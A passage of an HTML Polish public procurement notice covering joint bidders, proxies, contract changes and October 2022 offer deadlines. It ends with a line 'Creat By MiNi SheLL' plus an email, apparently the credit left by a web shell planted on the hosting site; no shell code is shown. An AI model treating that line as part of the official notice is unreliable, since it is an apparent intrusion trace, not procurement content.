jednego wykonawcę.<br/>Powyższe oznacza, że w przypadku wykazania doświadczenia zakazuje się łączenia zamówień przez dwa lub więcej<br/>podmioty.<br/>Ponadto wykonawca, będąc członkiem konsorcjum w uprzednio wykonanym zamówieniu, może posłużyć się nabytym<br/>doświadczeniem tylko i wyłącznie w przypadkach, kiedy dane dostawy wykonał osobiście. Istotna jest jedynie część<br/>faktycznie przez niego zrealizowana.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, który<br/>zakres wykonają poszczególni wykonawcy.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają warunki udziału w<br/>postępowaniu dotyczące sytuacji ekonomicznej lub finansowej oraz zdolności technicznej lub zawodowej, z zastrzeżeniem<br/>zapisów zawartych w rozdz. IX pkt 5.<br/>4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku, o którym mowa powyżej, wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>Pełnomocnictwo winno określać w szczególności:<br/>a) przedmiot postępowania, którego dotyczy,<br/>b) wszystkich wykonawców wspólnie ubiegających się o zamówienie,<br/>c) pełnomocnika,<br/>d) zakres umocowania pełnomocnika.<br/>Jeżeli oferta wykonawców, o których mowa w pkt 4 zostanie wybrana, zamawiający będzie żądał przed zawarciem umowy w<br/>sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający w załączniku nr 2 do SWZ określił postanowienia, które zostaną wprowadzone do umowy z Wykonawcą. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-03 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/ ePUAPu https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-03 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com